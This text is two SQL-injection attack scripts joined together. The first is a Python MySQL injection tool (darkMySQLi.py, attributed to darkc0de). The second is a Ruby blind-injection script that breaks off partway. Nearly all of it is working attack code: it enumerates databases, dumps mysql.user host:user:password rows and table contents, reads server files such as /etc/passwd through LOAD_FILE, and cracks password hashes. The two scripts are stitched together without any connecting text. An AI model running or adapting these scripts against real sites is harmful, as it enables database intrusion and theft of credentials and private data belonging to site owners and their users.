darkc0de.com |" print "|--------------------------------------------------|\n" #Arg Error Checking if mode != "--crack" and site == "": print "[-] URL is required!\n[-] Need Help? --help\n" sys.exit(1) if mode == "None": print "[-] Mode is required!\n[-] Need Help? --help\n" sys.exit(1) if mode == "--schema" and arg_database == "None": print "[-] Must include -D flag!\n[-] Need Help? --help\n" sys.exit(1) if mode == "--dump": if arg_table == "None" or arg_columns == "None": print "[-] Must include -T and -C flag. -D is Optional\n[-] Need Help? --help\n" sys.exit(1) if proxy != "None": if len(proxy.split(".")) == 2: proxy = open(proxy, "r").read() if proxy.endswith("\n"): proxy = proxy.rstrip("\n") proxy = proxy.split("\n") if arg_ssl == "off": if site[:4] != "http": site = "http://"+site else: if site[:5] != "https": site = "https://"+site if site.endswith("/*"): site = site.rstrip('/*') if site.endswith("--"): site = site.rstrip('--') if arg_cookie != "None": try: cj = cookielib.MozillaCookieJar() cj.load(arg_cookie) cookie_handler = urllib2.HTTPCookieProcessor(cj) except: print "[!] There was a problem loading your cookie file!" print "[!] Make sure the cookie file is in Mozilla Cookie File Format!" print "[!] http://xiix.wordpress.com/2006/03/23/mozillafirefox-cookie-format/\n" sys.exit(1) else: cookie_handler = urllib2.HTTPCookieProcessor() if mode != "--findcol" and arg_blind != "--blind" and mode != "--crack" and site.find("darkc0de") == -1: print "[-] Site must contain \'darkc0de\'\n" sys.exit(1) if arg_blind == "--blind" and arg_string == "": print "[-] You must specify a --string when using blind methodology.\n" sys.exit(1) if arg_columns != "None": arg_columns = arg_columns.split(",") if arg_insert != "None": arg_insert = arg_insert.split(",") if mode == "--crack" and arg_wordlist == "": print "[-] You must specify a --wordlist to crack with.\n" sys.exit(1) agent = random.choice(agents) file.write("\n|--------------------------------------------------|") file.write("\n| rsauron@gmail.com v1.6 |") file.write("\n| 1/2009 darkMySQLi.py |") file.write("\n| -- Multi Purpose MySQL Injection Tool -- |") file.write("\n| Usage: darkMySQLi.py [options] |") file.write("\n| -h help darkc0de.com |") file.write("\n|--------------------------------------------------|") ## MySQL Hash cracking if mode == "--crack": try: arg_wordlist = open(arg_wordlist, "r") except(IOError): print "[-] Error: Check your wordlist path\n";file.write("\n[-] Error: Check your wordlist path\n") sys.exit(1) if len(arg_hash) != 40 and len(arg_hash) != 16: print "\n[-] Improper hash length\n";file.write("\n\n[-] Improper hash length\n") sys.exit(1) arg_wordlist = arg_wordlist.readlines() print "[+] Words Loaded:",len(arg_wordlist);file.write("\n[+] Words Loaded: "+str(len(arg_wordlist))) if len(arg_hash) == 40: print "[+] Detected MySQL v5 Hash:",arg_hash;file.write("\n[+] Detected MySQL v5 Hash: "+arg_hash) try: import hashlib for word in arg_wordlist: if arg_hash == c1(word): print "\n[!] Password is:",word;file.write("\n\n[!] Password is: "+word) break except(ImportError): import sha for word in arg_wordlist: if arg_hash == c2(word): print "\n[!] Password is:",word;file.write("\n\n[!] Password is: "+word) break else: print "[+] Detected MySQL v4 Hash:",arg_hash print "[+] Try darkc0de hash database @ " for word in arg_wordlist: word = word.rstrip("\n") if arg_hash == mysql323(word): print "\n[!] Password is:",word+"\n";file.write("\n\n[!] Password is: "+word+"\n") break print "[-] Finished Searching..\n[-] Done\n";file.write("\n[-] Finished Searching..\n[-] Done\n") sys.exit(1) #General Info print "[+] URL:",site;file.write("\n\n[+] URL: "+site) print "[+] %s" % time.strftime("%X");file.write("\n[+] %s" % time.strftime("%X")) print "[+] Evasion:",arg_eva,arg_end;file.write("\n[+] Evasion: "+arg_eva+" "+arg_end) print "[+] Cookie:", arg_cookie;file.write("\n[+] Cookie: "+arg_cookie) if site[:5] == "https": print "[+] SSL: Yes";file.write("\n[+] SSL: Yes") else: print "[+] SSL: No";file.write("\n[+] SSL: No") print "[+] Agent:",agent;file.write("\n[+] Agent: "+agent) #Build proxy list proxy_list = [];proxy_list_count = [] if proxy != "None": print "[+] Building Proxy List...";file.write("\n[+] Building Proxy List...") for p in proxy: try: match = re.findall(":",p) if len(match) == 3: arg_proxy_auth = [] prox = p.split(":") arg_proxy_auth += prox if arg_proxy_auth != "": proxy_auth_handler = urllib2.HTTPBasicAuthHandler() proxy_auth_handler.add_password("none",p,arg_proxy_auth[2],arg_proxy_auth[3]) opener = urllib2.build_opener(proxy_auth_handler) opener.open("http://www.google.com") proxy_list.append(urllib2.build_opener(proxy_auth_handler, cookie_handler)) proxy_list_count.append(p);arg_proxy_auth = "" else: proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'}) opener = urllib2.build_opener(proxy_handler) opener.open("http://www.google.com") proxy_list.append(urllib2.build_opener(proxy_handler, cookie_handler)) proxy_list_count.append(p) if len(match) == 3 or len(match) == 1: print "\tProxy:",p,"- Success";file.write("\n\tProxy:"+p+" - Success") else: print "\tProxy:",p,arg_proxy_auth[2]+":"+arg_proxy_auth[3]+"- Success";file.write("\n\tProxy:"+p+" - Success") except: print "\tProxy:",p,"- Failed [ERROR]:",sys.exc_info()[0];file.write("\n\tProxy:"+p+" - Failed [ERROR]: "+str(sys.exc_info()[0])) pass if len(proxy_list) == 0: print "[-] All proxies have failed. App Exiting" sys.exit(1) print "[+] Proxy List Complete";file.write("\n[+] Proxy List Complete") else: print "[-] Proxy Not Given";file.write("\n[+] Proxy Not Given") proxy_list.append(urllib2.build_opener(cookie_handler)) proxy_list_count.append("None") proxy_num = 0 proxy_len = len(proxy_list) ## Blind String checking! if arg_blind == "--blind": print "[!] Blind Methodology will be used!";file.write("\n[!] Blind Methodology will be used!") head_URL = site+"+AND+1=1" source = GetThatShit(head_URL) match = re.findall(arg_string,source) if len(match) >= 2: print "\n[-] The String you used has been found on the target page in-use more than 2 times" print "[-] This might lead to false positives with the blind methodology" print "[-] Might not mean anything.. I am just trying to help out.." print "[-] If you have problems you might know why.. ;-)\n" if len(match) == 0: print "\n[-] The String you used has not been found in the target URL!\n[-] Please try another.\n[-] Done.\n" sys.exit(1) if len(match) == 1: print "[+] Blind String Selected is Good ;-)";file.write("\n[+] Blind String Selected is Good ;-)") #Column Finder c0de if mode == "--findcol": print "[+] Attempting To find the number of columns...";file.write("\n[+] Attempting To find the number of columns...") print "[+] Testing: ", file.write("\n[+] Testing: ",) checkfor=[];nullFound=[];nullnum=[];makepretty = "" sitenew = site+"+AND+1=2+UNION+SELECT+" for x in xrange(1,colMax): try: sys.stdout.write("%s," % (x)) file.write(str(x)+",") sys.stdout.flush() darkc0de = "dark"+str(x)+"code" checkfor.append(darkc0de) if x > 1: sitenew += "," sitenew += "0x"+darkc0de.encode("hex") finalurl = sitenew+arg_end source = GetThatShit(finalurl) for y in checkfor: colFound = re.findall(y,source) if len(colFound) != 0: nullFound.append(colFound[0]) if len(nullFound) >= 1: print "\n[+] Column Length is:",len(checkfor);file.write("\n[+] Column Length is: "+str(len(checkfor))) print "[+] Found null column at column #: ",;file.write("\n[+] Found null column at column #: ",) for z in nullFound: nullcol = re.findall(("\d+"),z) nullnum.append(nullcol[0]) sys.stdout.write("%s," % (nullcol[0])) file.write(str(nullcol[0])+",") sys.stdout.flush() for z in xrange(0,len(checkfor)): z+=1 if z > 1: makepretty += "," makepretty += str(z) site = site+arg_eva+"AND"+arg_eva+"1=2"+arg_eva+"UNION"+arg_eva+"SELECT"+arg_eva+makepretty+arg_end print "\n\n[!] SQLi URL:",site;file.write("\n\n[!] SQLi URL: "+site) for z in nullnum: site = site.replace("+"+z+",","+darkc0de,") site = site.replace(","+z+",",",darkc0de,") site = site.replace(","+z+arg_end,",darkc0de"+arg_end) print "[!] darkMySQLi URL:",site;file.write("\n[!] darkMySQLi URL: "+site) print "\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X")) print "[-] Total URL Requests:",gets;file.write("\n[-] Total URL Requests: "+str(gets)) print "[-] Done\n";file.write("\n[-] Done\n") print "Don't forget to check", logfile,"\n" file.close();sys.exit(1) except (KeyboardInterrupt, SystemExit): raise except: pass print "\n[!] Sorry Column Length could not be found." file.write("\n[!] Sorry Column Length could not be found.") print "[-] You might try to change colMax variable or change evasion option.. or last but not least do it manually!" print "[-] Done\n" sys.exit(1) #Retrieve version:user:database if arg_blind != "--blind": head_URL = site.replace("darkc0de","concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20)")+arg_end print "[+] Gathering MySQL Server Configuration...";file.write("\n[+] Gathering MySQL Server Configuration...\n") source = GetThatShit(head_URL) match = re.findall("\x1e\x1e\S+",source) if len(match) >= 1: match = match[0][0:].split("\x1e") version = match[2] user = match[3] database = match[4] print "\tDatabase:", database;file.write("\tDatabase: "+database+"\n") print "\tUser:", user;file.write("\tUser: "+user+"\n") print "\tVersion:", version;file.write("\tVersion: "+version) else: print "\n[-] There seems to be a problem with your URL. Please check and try again.\n[DEBUG]:",head_URL.replace("+",arg_eva),"\n" sys.exit(1) else: print "[+] Preforming Quick MySQL Version Check...";file.write("\n[+] Preforming Quick MySQL Version Check...") while 1: config_URL = site+"+and+substring(@@version,1,1)="+str(ser_ver) source = GetThatShit(config_URL) match = re.findall(arg_string,source) if len(match) >= 1: print "\t[+] MySQL >= v"+str(ser_ver)+".0.0 found!";file.write("\n\t[+] MySQL >= v"+str(ser_ver)+".0.0 found!") version += str(ser_ver) break if ser_ver == 6: print "[-] Was unable to determine MySQL version.\n[-] Done" sys.exit(1) ser_ver+=1 #lets check what we can do based on version if mode == "--schema" or mode == "--dbs" or mode == "--full": if version[0] == str(4): print "\n[-] Mode Selected is incompatible with MySQL v4 Servers" print "[-] -h for help" sys.exit(1) # Mode --info if mode == "--info" and arg_blind != "--blind": head_URL = site.replace("darkc0de","0x"+"darkc0de".encode("hex"))+"+FROM+mysql.user"+arg_end source = GetThatShit(head_URL) match = re.findall("darkc0de",source) if len(match) >= 1: yesno = "YES <-- w00t w00t" else: yesno = "NO" print "\n[+] Do we have Access to MySQL Database:",yesno;file.write("\n\n[+] Do we have Access to MySQL Database: "+str(yesno)) if yesno == "YES <-- w00t w00t": print "\n[+] Dumping MySQL user info. host:user:password";file.write("\n\n[+] Dumping MySQL user info. host:user:password") head_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+mysql.user"+arg_end source = GetThatShit(head_URL) match = re.findall("\x1e\x1e\S+",source);match = match[0].strip("\x1e").split("\x1e");userend = match[0] print "[+] Number of users in the mysql.user table:",userend;file.write("[+] Number of users in the mysql.user table: "+str(userend)) head_URL = site.replace("darkc0de","concat(0x1e,0x1e,host,0x1e,user,0x1e,password,0x1e,0x20)") head_URL = head_URL+"+FROM+mysql.user+LIMIT+NUM,1"+arg_end for x in range(0,int(userend)): try: source = GetThatShit(head_URL.replace("NUM",str(x))) match = re.findall("\x1e\x1e\S+",source) match = match[0].strip("\x1e").split("\x1e") if len(match) != 3: nullvar = "NULL" match += nullvar print "\t["+str(x)+"]",match[0]+":"+match[1]+":"+match[2];file.write("\n["+str(x)+"] "+str(match[0])+":"+str(match[1])+":"+str(match[2])) except (KeyboardInterrupt, SystemExit): raise except: pass else: print "\n[-] MySQL user enumeration has been skipped!\n[-] We do not have access to mysql DB on this target!" file.write("\n\n[-] MySQL user enumeration has been skipped!\n[-] We do not have access to mysql DB on this target!") head_URL = site.replace("darkc0de","concat(load_file(0x2f6574632f706173737764),0x3a,0x6461726b63306465)")+arg_end source = GetThatShit(head_URL) match = re.findall("darkc0de",source) if len(match) >= 1: yesno = "YES <-- w00t w00t" else: yesno = "NO" print "\n[+] Do we have Access to Load_File:",yesno;file.write("\n\n[+] Do we have Access to Load_File: "+str(yesno)) if yesno == "YES <-- w00t w00t": fuzz_load = open(loadfilefuzz, "r").readlines() head_URL = site.replace("darkc0de","concat(load_file('%2Fetc%2Fpasswd'),0x3a,0x6461726b63306465)")+arg_end source = GetThatShit(head_URL) match = re.findall("darkc0de",source) if len(match) > 1: onoff = "OFF <-- w00t w00t" else: onoff = "ON" print "\n[+] Magic quotes are:",onoff yesno = str(raw_input("\n[!] Would You like to fuzz LOAD_FILE (Yes/No): ")) if yesno == "Y" or yesno == "y" or yesno == "Yes" or yesno == "yes": print "\n[+] Starting Load_File Fuzzer...";file.write("\n\n[+] Starting Load_File Fuzzer...") print "[+] Number of system files to be fuzzed:",len(fuzz_load),"\n";file.write("\n[+] Number of tables names to be fuzzed: "+str(len(fuzz_load))+"\n") for sysfile in fuzz_load: sysfile = sysfile.rstrip("\n") if proxy != "None": sysfile = sysfile.replace("/","%2F") sysfile = sysfile.replace(".","%2E") if onoff == "OFF <-- w00t w00t": head_URL = site.replace("darkc0de","concat(LOAD_FILE(\'"+sysfile+"\'),0x3a,0x6461726b63306465)")+arg_end else: head_URL = site.replace("darkc0de","concat(LOAD_FILE(0x"+sysfile.encode("hex")+"),0x3a,0x6461726b63306465)")+arg_end source = GetThatShit(head_URL) match = re.findall("darkc0de",source) if len(match) > 0: print "[!] Found",sysfile;file.write("\n[!] Found "+sysfile) head_URL = head_URL.replace("concat(","") head_URL = head_URL.replace(",0x3a,0x6461726b63306465)","") print "[!]",head_URL;file.write("\n[!] "+head_URL) else: print "\n[-] Load_File Fuzzer has been by skipped!\n[-] Load_File disabled on this target!" file.write("\n\n[-] Load_File Fuzzer has been by skipped!\n[-] Load_File disabled on this target!") #Fuzz table/columns if mode == "--fuzz": fuzz_tables = open(tablefuzz, "r").readlines() fuzz_columns = open(columnfuzz, "r").readlines() print "[+] Beginning table and column fuzzer...";file.write("[+] Beginning table and column fuzzer...") print "[+] Number of tables names to be fuzzed:",len(fuzz_tables);file.write("\n[+] Number of tables names to be fuzzed: "+str(len(fuzz_tables))) print "[+] Number of column names to be fuzzed:",len(fuzz_columns);file.write("\n[+] Number of column names to be fuzzed: "+str(len(fuzz_columns))) print "[+] Searching for tables and columns...";file.write("\n[+] Searching for tables and columns...") if arg_blind == "--blind": fuzz_URL = site+"+and+(SELECT+1+from+TABLE+limit+0,1)=1" else: fuzz_URL = site.replace("darkc0de","0x"+"darkc0de".encode("hex"))+"+FROM+TABLE"+arg_end for table in fuzz_tables: table = table.rstrip("\n") table_URL = fuzz_URL.replace("TABLE",table) source = GetThatShit(table_URL) if arg_blind == "--blind": match = re.findall(arg_string,source) else: match = re.findall("darkc0de", source); if len(match) > 0: print "\n[!] Found a table called:",table;file.write("\n\n[+] Found a table called: "+str(table)) print "\n[+] Now searching for columns inside table \""+table+"\"";file.write("\n\n[+] Now searching for columns inside table \""+str(table)+"\"") if arg_blind == "--blind": table_URL = site+"+and+(SELECT+substring(concat(1,COLUMN),1,1)+from+"+table+"+limit+0,1)=1" for column in fuzz_columns: column = column.rstrip("\n") if arg_blind == "--blind": column_URL = table_URL.replace("COLUMN",column) else: column_URL = table_URL.replace("0x6461726b63306465","concat(0x6461726b63306465,0x3a,"+column+")") source = GetThatShit(column_URL) if arg_blind == "--blind": match = re.findall(arg_string,source) else: match = re.findall("darkc0de",source) if len(match) > 0: print "[!] Found a column called:",column;file.write("\n[!] Found a column called:"+column) print "[-] Done searching inside table \""+table+"\" for columns!";file.write("\n[-] Done searching inside table \""+str(table)+"\" for columns!") #Build URLS for each different mode if mode == "--schema": if arg_database != "None" and arg_table == "None": if arg_blind == "--blind": print "[+] Showing Tables from database \""+arg_database+"\"";file.write("\n[+] Showing Tables from database \""+arg_database+"\"") count_URL = site+"+and+((SELECT+COUNT(table_name)" count_URL += "+FROM+information_schema.TABLES+WHERE+table_schema=0x"+arg_database.encode("hex")+"))" line_URL = site+"+and+ascii(substring((SELECT+table_name" line_URL += "+FROM+information_schema.TABLES+WHERE+table_schema=0x"+arg_database.encode("hex") else: print "[+] Showing Tables & Columns from database \""+arg_database+"\"" file.write("\n[+] Showing Tables & Columns from database \""+arg_database+"\"") line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)") line_URL += "+FROM+information_schema.columns+WHERE+table_schema=0x"+arg_database.encode("hex") count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(table_schema),0x1e,0x20)") count_URL += "+FROM+information_schema.tables+WHERE+table_schema=0x"+arg_database.encode("hex") arg_row = "Tables" if arg_database != "None" and arg_table != "None": if arg_blind == "--blind": print "[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"" file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"") count_URL = site+"+and+((SELECT+COUNT(column_name)" count_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex")+"))" line_URL = site+"+and+ascii(substring((SELECT+column_name" line_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex") else: print "[+] Showing Columns from Database \""+arg_database+"\" and Table \""+arg_table+"\"" file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"") line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)") line_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex") count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)") count_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex") arg_row = "Columns" elif mode == "--dump": print "[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\"" file.write("\n[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\"") print "[+] and Column(s) "+str(arg_columns);file.write("\n[+] Column(s) "+str(arg_columns)) if arg_blind == "--blind": darkc0de = "" for column in arg_columns: darkc0de += column+",0x3a," darkc0de = darkc0de.rstrip("0x3a,") count_URL = site+"+and+((SELECT+COUNT(*)+FROM+"+arg_database+"."+arg_table line_URL = site+"+and+ascii(substring((SELECT+concat("+darkc0de+")+FROM+"+arg_database+"."+arg_table else: for column in arg_columns: darkc0de += column+",0x1e," count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+"+arg_database+"."+arg_table line_URL = site.replace("darkc0de",darkc0de+"0x1e,0x20)")+"+FROM+"+arg_database+"."+arg_table if arg_where != "" or arg_orderby != "": if arg_where != "": arg_where = arg_where.split(",") print "[+] WHERE clause:","\""+arg_where[0]+"="+arg_where[1]+"\"" arg_where = "WHERE+"+arg_where[0]+"="+"0x"+arg_where[1].encode("hex") if arg_orderby != "": arg_orderby = "ORDER+BY+'"+arg_orderby+"'" print "[+] ORDERBY clause:",arg_orderby count_URL += "+"+arg_where line_URL += "+"+arg_where+"+"+arg_orderby if version[0] == 4: count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+"+arg_table line_URL = site.replace("darkc0de",darkc0de+"0x1e,0x20)")+"+FROM+"+arg_table elif mode == "--full": print "[+] Starting full SQLi information_schema enumeration..." line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)") line_URL += "+FROM+information_schema.columns+WHERE+table_schema!=0x"+"information_schema".encode("hex") count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)") count_URL += "+FROM+information_schema.columns+WHERE+table_schema!=0x"+"information_schema".encode("hex") elif mode == "--dbs": print "[+] Showing all databases current user has access too!" file.write("\n[+] Showing all databases current user has access too!") if arg_blind == "--blind": count_URL = site+"+and+((SELECT+COUNT(schema_name)" count_URL += "+FROM+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex")+"))" line_URL = site+"+and+ascii(substring((SELECT+schema_name" line_URL += "+from+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex") else: count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)") count_URL += "+FROM+information_schema.schemata+WHERE+schema_name!=0x"+"information_schema".encode("hex") line_URL = site.replace("darkc0de","concat(0x1e,0x1e,schema_name,0x1e,0x20)") line_URL += "+FROM+information_schema.schemata+WHERE+schema_name!=0x"+"information_schema".encode("hex") arg_row = "Databases" if arg_blind == "--blind": count_URL+="))" line_URL+="+LIMIT+" else: count_URL += arg_end line_URL += "+LIMIT+NUM,1"+arg_end ## Blind Info --- I know it doesnt make sence where this code is.. but.. fuck it... if mode == "--info" and arg_blind == "--blind": head_URL = site+"+and+(SELECT+1+from+mysql.user+limit+0,1)=1" source = GetThatShit(head_URL) match = re.findall(arg_string,source) if len(match) >= 1: yesno = "YES <-- w00t w00t\n[!] Retrieve Info: --dump -D mysql -T user -C user,password" else: yesno = "NO" print "\n[+] Do we have Access to MySQL Database:",yesno;file.write("\n\n[+] Do we have Access to MySQL Database: "+str(yesno)) print "\n[+] Showing database version, username@location, and database name!" file.write("\n\n[+] Showing database version, username@location, and database name!") line_URL = site+"+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database()))," row_value = 1 #Lets Count how many rows or columns if mode == "--schema" or mode == "--dump" or mode == "--dbs" or mode == "--full": if arg_blind == "--blind": row_value = GuessValue(count_URL) else: source = GetThatShit(count_URL) match = re.findall("\x1e\x1e\S+",source) match = match[0][2:].split("\x1e") row_value = match[0] print "[+] Number of "+arg_row+": "+str(row_value);file.write("\n[+] Number of "+arg_row+": "+str(row_value)+"\n") ## UNION Schema Enumeration and DataExt loop if arg_blind == "--union": if mode == "--schema" or mode == "--dump" or mode == "--dbs" or mode == "--full": while int(table_num) != int(row_value): try: source = GetThatShit(line_URL.replace("NUM",str(num))) match = re.findall("\x1e\x1e\S+",source) if len(match) >= 1: if mode == "--schema" or mode == "--full": match = match[0][2:].split("\x1e") if cur_db != match[0]: cur_db = match[0] if table_num == 0: print "\n[Database]: "+match[0];file.write("\n[Database]: "+match[0]+"\n") else: print "\n\n[Database]: "+match[0];file.write("\n\n[Database]: "+match[0]+"\n") print "[Table: Columns]";file.write("[Table: Columns]\n") if cur_table != match[1]: print "\n["+str(table_num+1)+"]"+match[1]+": "+match[2], file.write("\n["+str(table_num+1)+"]"+match[1]+": "+match[2]) cur_table = match[1] #table_num+=1 table_num = int(table_num) + 1 else: sys.stdout.write(",%s" % (match[2])) file.write(","+match[2]) sys.stdout.flush() #Gathering Databases only elif mode == "--dbs": match = match[0] if table_num == 0: print "\n["+str(num+1)+"]",match;file.write("\n["+str(num+1)+"]"+str(match)) else: print "["+str(num+1)+"]",match;file.write("\n["+str(num+1)+"]"+str(match)) table_num+=1 #Collect data from tables & columns elif mode == "--dump": match = re.findall("\x1e\x1e+.+\x1e\x1e",source) if match == []: match = [''] else: match = match[0].strip("\x1e").split("\x1e") if arg_rowdisp == 1: print "\n["+str(num+1)+"] ",;file.write("\n["+str(num+1)+"] ",) else: print;file.write("\n") for ddata in match: if ddata == "": ddata = "NoDataInColumn" sys.stdout.write("%s:" % (ddata)) file.write("%s:" % ddata) sys.stdout.flush() table_num+=1 else: if mode == "--dump": table_num+=1 sys.stdout.write("\n[%s] No data" % (num)) file.write("\n[%s] No data" % (num)) break num+=1 except (KeyboardInterrupt, SystemExit): raise except: pass ## Blind Schema Enumeration and DataExt loop if arg_blind == "--blind": if mode == "--schema" or mode == "--dbs" or mode == "--dump" or mode == "--info": lower_bound = 0 upper_bound = 127 print for data_row in range(int(num), row_value): sys.stdout.write("[%s]: " % (lim_num)) file.write("\n[%s]: " % (lim_num)) sys.stdout.flush() value = chr(upper_bound) while value != chr(0): if mode == "--info": Guess_URL = line_URL + str(let_pos)+",1))" else: Guess_URL = line_URL + str(lim_num) +",1),"+str(let_pos)+",1))" value = chr(GuessValue(Guess_URL)) sys.stdout.write("%s" % (value)) file.write(value) sys.stdout.flush() let_pos+=1 print lim_num = int(lim_num) + 1 let_pos = 1 data_row+=1 #Lets wrap it up! if mode == "--schema" or mode == "--full" or mode == "--dump": print "\n\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X")) else: print "\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X")) print "[-] Total URL Requests:",gets;file.write("\n[-] Total URL Requests: "+str(gets)) print "[-] Done\n";file.write("\n[-] Done\n") print "Don't forget to check", logfile,"\n" file.close()

#MySQL Blind Inyection Tool #Coder => SH4V #n3t-datagrams.net require 'net/http' puts "host:" host=gets.chomp puts "extension:" ext=gets.chomp puts "columna:" col=gets.chomp puts "tabla:" tab= gets.chomp num="0" url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),1,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body corp2=http.get("#{url}333") corp2=corp2.body lon1=corp1.length lon2=corp2.length while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),1,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),2,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),3,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),4,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),5,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),6,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),7,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),8,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),9,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),10,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),11,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),12,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),13,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),14,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),15,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),16,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),17,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),18,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body 